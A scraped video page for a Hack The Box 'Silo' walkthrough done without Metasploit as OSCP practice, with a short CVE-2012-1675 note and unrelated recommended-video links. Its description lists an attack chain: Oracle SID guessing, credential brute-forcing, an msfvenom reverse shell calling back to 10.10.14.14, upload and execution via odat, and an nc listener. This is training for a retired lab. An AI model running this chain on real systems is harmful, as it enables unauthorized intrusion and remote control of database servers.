Hack The Box Silo Walkthrough without Metasploit | OSCP Preparation 2022

แชร์
ฝัง
  • เผยแพร่เมื่อ 24 ม.ค. 2025
  • Hi Folks
    This is the "Hack The Box Silo Walkthrough without Metasploit 2022" video. I am publishing walkthroughs on retired "Hack The Box" machines in preparation for the OSCP.
    The full list of OSCP-like machines compiled by TJnull can be found below link
    docs.google.co...
    +++++++++++++++++++++++++++++++++++++++++++++++++++++
    Commands:
    1. To Enumerate the #oracle #sids
    python3 odat.py sidguesser -s 10.10.10.82
    or
    hydra -L (wordlist of Oracle SIDs) -t (number of threads) -s (port number) (target ip address) oracle-sid
    2. To #bruteforce username and password
    python3 odat.py passwordguesser -s (target_ip) -p (target_port_number) -d (target_SID) --accounts-file (oracle_username_password_list)
    3. Create #reverse_shell using #msfvenom
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.14 LPORT=1234 -f exe shell.exe
    4. Upload #reverse_shell on Silo machine using odat.py
    python3 odat.py utlfile -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --putFile /temp tt.exe tt.exe --sysdba
    5. Start port listening on your local machine
    nc -lnvp 1234
    6. Execute #reverse_shell on Silo machine using odat.py
    python3 odat.py externaltable -s 10.10.10.82 -p 1521 -U "scott" -P "tiger" -d XE --exec /temp tt.exe --sysdba
    +++++++++++++++++++++++++++++++++++++++++++++++++++
    What is a SID?
    The SID (Service Identifier) is essentially the database name, depending on the installation you may have one or more default SIDs, or even a totally custom dba-defined SID.
    What is oracle tns listener vulnerability?
    This security alert addresses the security issue CVE-2012-1675, a vulnerability in the TNS listener which has been recently disclosed as a "TNS Listener Poison Attack" affecting the Oracle Database Server. This vulnerability may be remotely exploitable without authentication, i.e. it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the confidentiality, integrity, and availability of systems that do not have recommended solutions applied.
    ++++++++++++++++++++++++++++++++++++++++
    Thanks for watching my video.
    Put your queries and suggestions in the comment box.
    Like
    Share
    Subscribe

ความคิดเห็น • 2

  • @snooze_4pm
    @snooze_4pm 2 ปีที่แล้ว

    Keep the hard work remember empire’s doesn’t get build in one day if TH-cam recommended you to me that’s mean one day you’ll be famous brother stay safe and help others ❤

ต่อไป
เล่นอัตโนมัติ
Hack The Box Bounty Walkthrough without Metasploit | OSCP Preparation 202225:03Hack The Box Bounty Walkthrough without Metasploit | OSCP Preparation 2022
Hack The Box Bounty Walkthrough without Metasploit | OSCP Preparation 2022KamalProjects
มุมมอง 723
Scale AI CEO Alexandr Wang on U.S.-China AI race: We need to unleash U.S. energy to enable AI boom7:50Scale AI CEO Alexandr Wang on U.S.-China AI race: We need to unleash U.S. energy to enable AI boom
Scale AI CEO Alexandr Wang on U.S.-China AI race: We need to unleash U.S. energy to enable AI boomCNBC Television
มุมมอง 536K
This AI Robot Is Doing the Impossible - Unitree x ElizaWakesUp9:30This AI Robot Is Doing the Impossible - Unitree x ElizaWakesUp
This AI Robot Is Doing the Impossible - Unitree x ElizaWakesUpAI Revolution
มุมมอง 162K
#WOWxดราม่าคอมเม้นแฟนบอลอาเซียน ตะลึง!! แห่ชื่นชมสปิริตทีมชาติไทย หลังเกมส์พลิกชนะสิงคโปร์ 4-210:34#WOWxดราม่าคอมเม้นแฟนบอลอาเซียน ตะลึง!! แห่ชื่นชมสปิริตทีมชาติไทย หลังเกมส์พลิกชนะสิงคโปร์ 4-2
#WOWxดราม่าคอมเม้นแฟนบอลอาเซียน ตะลึง!! แห่ชื่นชมสปิริตทีมชาติไทย หลังเกมส์พลิกชนะสิงคโปร์ 4-2# จัน ฑาล
มุมมอง 201K
ช่วยหนูด้วยคะ #shorts #แม่สุซูกัส00:56ช่วยหนูด้วยคะ #shorts #แม่สุซูกัส
ช่วยหนูด้วยคะ #shorts #แม่สุซูกัสHeHaa TV
มุมมอง 2.3M
ทัวร์สตรีมเมอร์ ROV ชิงเงินรางวัลรวม 25,000 บาท 8 ทีม : รอบ 8 ทีม5:25:16ทัวร์สตรีมเมอร์ ROV ชิงเงินรางวัลรวม 25,000 บาท 8 ทีม : รอบ 8 ทีม
ทัวร์สตรีมเมอร์ ROV ชิงเงินรางวัลรวม 25,000 บาท 8 ทีม : รอบ 8 ทีมChicken V
มุมมอง 215K
#JasonDeruloTV // Funny #GotPermissionToPost From @SofiManassyan #SlowLow00:18#JasonDeruloTV // Funny #GotPermissionToPost From @SofiManassyan #SlowLow
#JasonDeruloTV // Funny #GotPermissionToPost From @SofiManassyan #SlowLowJason Derulo
มุมมอง 14M
Industrial robots are (almost) perfect12:24Industrial robots are (almost) perfect
Industrial robots are (almost) perfectAtomic Frontier
มุมมอง 3K
Create self signer Certificate for Domain and development testing - free8:07Create self signer Certificate for Domain and development testing - free
Create self signer Certificate for Domain and development testing - freeMr. Duvi Tech
มุมมอง 59
Beginner's Tutorial Exploiting SQL Injection with SQLMAP15:42Beginner's Tutorial Exploiting SQL Injection with SQLMAP
Beginner's Tutorial Exploiting SQL Injection with SQLMAPKamalProjects
มุมมอง 217
Build and Sell a Digital Product in a Weekend9:10Build and Sell a Digital Product in a Weekend
Build and Sell a Digital Product in a WeekendOliur Online
มุมมอง 18K
DeepSeek R1 Just Revolutionized AI Forever21:06DeepSeek R1 Just Revolutionized AI Forever
DeepSeek R1 Just Revolutionized AI ForeverCole Medin
มุมมอง 45K
Salesforce CEO Marc Benioff: Don't think Microsoft will use OpenAI in the future7:04Salesforce CEO Marc Benioff: Don't think Microsoft will use OpenAI in the future
Salesforce CEO Marc Benioff: Don't think Microsoft will use OpenAI in the futureCNBC Television
มุมมอง 216K
Google’s New AI Is Recreating the Whole World to Unlock Superhuman Intelligence9:16Google’s New AI Is Recreating the Whole World to Unlock Superhuman Intelligence
Google’s New AI Is Recreating the Whole World to Unlock Superhuman IntelligenceAI Revolution
มุมมอง 237K
OSCP | Hack The Box Devel | Write-up without Metasploit | OSCP Prepration 202023:49OSCP | Hack The Box Devel | Write-up without Metasploit | OSCP Prepration 2020
OSCP | Hack The Box Devel | Write-up without Metasploit | OSCP Prepration 2020KamalProjects
มุมมอง 559
🔴LIVE โหนกระแส บาร์โฮสสะเทือน!!! "สุนิสา" อาละวาดไล่หลอกเงิน1:50:02🔴LIVE โหนกระแส บาร์โฮสสะเทือน!!! "สุนิสา" อาละวาดไล่หลอกเงิน
🔴LIVE โหนกระแส บาร์โฮสสะเทือน!!! "สุนิสา" อาละวาดไล่หลอกเงินโหนกระแส [Hone-Krasae] official
มุมมอง 1.1M
#JasonDeruloTV // Funny #GotPermissionToPost From @SofiManassyan #SlowLow00:18#JasonDeruloTV // Funny #GotPermissionToPost From @SofiManassyan #SlowLow
#JasonDeruloTV // Funny #GotPermissionToPost From @SofiManassyan #SlowLowJason Derulo
มุมมอง 14M
总算是用上情侣手机壳了 #玩一种很新的东西 #手机壳 #情侣00:10总算是用上情侣手机壳了 #玩一种很新的东西 #手机壳 #情侣
总算是用上情侣手机壳了 #玩一种很新的东西 #手机壳 #情侣摩摩
มุมมอง 4.3M
Players vs Trophies 🤯00:28Players vs Trophies 🤯
Players vs Trophies 🤯LE FOOT EN VIDÉO
มุมมอง 9M
ถ้าม้าโดนแกล้งที่โรงเรียน ม้าจะฟ้องครูว่าอะไร #แต้มเซน #การ์ตูน #tamzen #ตลก #shortvideo #การ์ตูน00:29ถ้าม้าโดนแกล้งที่โรงเรียน ม้าจะฟ้องครูว่าอะไร #แต้มเซน #การ์ตูน #tamzen #ตลก #shortvideo #การ์ตูน
ถ้าม้าโดนแกล้งที่โรงเรียน ม้าจะฟ้องครูว่าอะไร #แต้มเซน #การ์ตูน #tamzen #ตลก #shortvideo #การ์ตูนTAMZEN
มุมมอง 19K
ไฮไลท์ฟุตบอล พรีเมียร์ลีก 2024/25 สัปดาห์ที่ 16 : แมนเชสเตอร์ ซิตี้ พบ แมนเชสเตอร์ ยูไนเต็ด03:59ไฮไลท์ฟุตบอล พรีเมียร์ลีก 2024/25 สัปดาห์ที่ 16 : แมนเชสเตอร์ ซิตี้ พบ แมนเชสเตอร์ ยูไนเต็ด
ไฮไลท์ฟุตบอล พรีเมียร์ลีก 2024/25 สัปดาห์ที่ 16 : แมนเชสเตอร์ ซิตี้ พบ แมนเชสเตอร์ ยูไนเต็ดTrueVisionsOfficial
มุมมอง 2.5M
มายคราฟ แต่ ผมห้ามตาย..!!! #minecraft #พี่เก้า #มายคราฟ #minecraftmtr00:58มายคราฟ แต่ ผมห้ามตาย..!!! #minecraft #พี่เก้า #มายคราฟ #minecraftmtr
มายคราฟ แต่ ผมห้ามตาย..!!! #minecraft #พี่เก้า #มายคราฟ #minecraftmtrMTR Mysterios
มุมมอง 100K
Highlight | อัจฉริยะสาวไส้...เบื้องลึกเหตุยิง "สจ.โต้งปราจีนบุรี" | เปิดโต๊ะข่าว | 17 ธ.ค.6714:51Highlight | อัจฉริยะสาวไส้...เบื้องลึกเหตุยิง "สจ.โต้งปราจีนบุรี" | เปิดโต๊ะข่าว | 17 ธ.ค.67
Highlight | อัจฉริยะสาวไส้...เบื้องลึกเหตุยิง "สจ.โต้งปราจีนบุรี" | เปิดโต๊ะข่าว | 17 ธ.ค.67PPTV HD 36
มุมมอง 390K